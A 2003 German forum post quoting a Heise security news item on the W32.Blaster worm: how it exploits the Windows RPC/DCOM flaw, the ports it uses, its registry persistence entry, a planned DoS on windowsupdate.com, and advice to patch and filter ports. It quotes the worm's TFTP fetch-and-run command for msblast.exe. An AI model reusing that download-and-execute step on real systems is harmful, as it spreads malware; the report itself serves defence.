Board Of Metal Smalltalk und Diverses Multimedia- & Freizeitforum v Probleme mit den "Remoteprozeduraufruf"

Hallo, Gast! Registrieren

Themabewertung:
  • 0 Bewertung(en) - 0 im Durchschnitt
  • 1
  • 2
  • 3
  • 4
  • 5
Ansichts-Optionen
Probleme mit den "Remoteprozeduraufruf"
maniac Offline
Man On The Silver Mountain
*****
Beiträge: 390
Themen: 28
Registriert seit: Dec 2002
Bewertung: 0
#20
12.08.2003, 09:57
Aktuelle News-Meldung von Heise.de

Zitat:Alle Schotten dicht -- W32.Blaster greift an

Der seit Tagen erwartete Wurm, der einen Fehler im RPC/DCOM-Dienst unter Windows 2000 und XP ausnutzt, ist im Internet unterwegs. Symantec taufte ihn W32.Blaster, McAfee nennt ihn W32.Lovsan. Das Bundeasamt fuer Sicherheit in der Informationstechnik (BSI) hat ebenfalls bereits eine Warnung herausgegben, siehe dazu das BSI-Advisory auf heise Security.

Auf befallenenen Systemen (A) startet der Wurm einen TFTP-Server und greift weitere Windows-Systeme (B) auf den Ports UDP-Ports 135, 137 und 138, sowie den TCP-Ports 135, 445 und 593 an. War ein Angriff erfolgreich, wird der eingeschleuste Code ausgefuehrt, der auf System B eine Shell auf Port 4444 oeffnet. System A veranlasst System B mittels TFTP (tftp <host a> get msblast.exe) die Datei msblast.exe in das Verzeichnis %WinDir%System32 nachzuladen und zu starten. Anschliessend installiert sich der Wurm auf System B, schliesst Port 4444, startet einen TFTP-Server und greift weitere Systeme an.

Der Wurm versucht nach Angaben von Symantec eine Denial-of-Service-Attacke gegen windowsupdate.com durchzufuehren. Als Zeitraum dafuer ist der 15. August bis 31. Dezember definiert. Auf befallenen Systemen werden folgende Registry Eintraege erzeugt:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
Run "windows auto update" = msblast.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
Run "windows auto update" = msblast.exe I just want to say LOVE YOU SAN!! bill 

Erkennbar ist ein Befall auch am offenen UDP-Port 69, auf dem der TFTP-Server auf ankommende Verbindungen wartet. Darueberhinaus oeffnet ein infiziertes System 20 TCP-Ports im Bereich 2500 bis 2522 und versucht Verbindungen mit weiteren Systemen aufzunehmen. Der genaue Zweck dieser Verbindungen ist noch unklar, Symantec gibt an, dass sie zu Angriffszwecken geoeffnet werden. NAI weist hingegen darauf hin, dass die Ports im LISTEN-Mode geoeffnet werden, also auf eingehende Verbindungen warten.

Symantec hat bereits ein Removal-Tool bereitgestellt, um den Wurm von befallenen System zu entfernen.

Es wird dringend empfohlen, die Patches zum Beseitigen der Sicherheitsluecke einzuspielen. Da der Patch einen weiteren Fehler im RPC-Dienst, der DoS-Attacken ermoeglicht, nicht beseitigt, sollten zusaetzlich die UDP- und TCP-Ports 135 bis 139, 445 und 593 gefiltert werden. (dab/c't)

<a href='http://safeurl.de/?http://www.heise.de/newsticker/data/dab-12.08.03-000/' target='_blank'>Heise.de</a>
Suchen
Antworten


Nachrichten in diesem Thema
Probleme mit den "Remoteprozeduraufruf" - von Wizz21 - 11.08.2003, 23:31

Gehe zu:


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste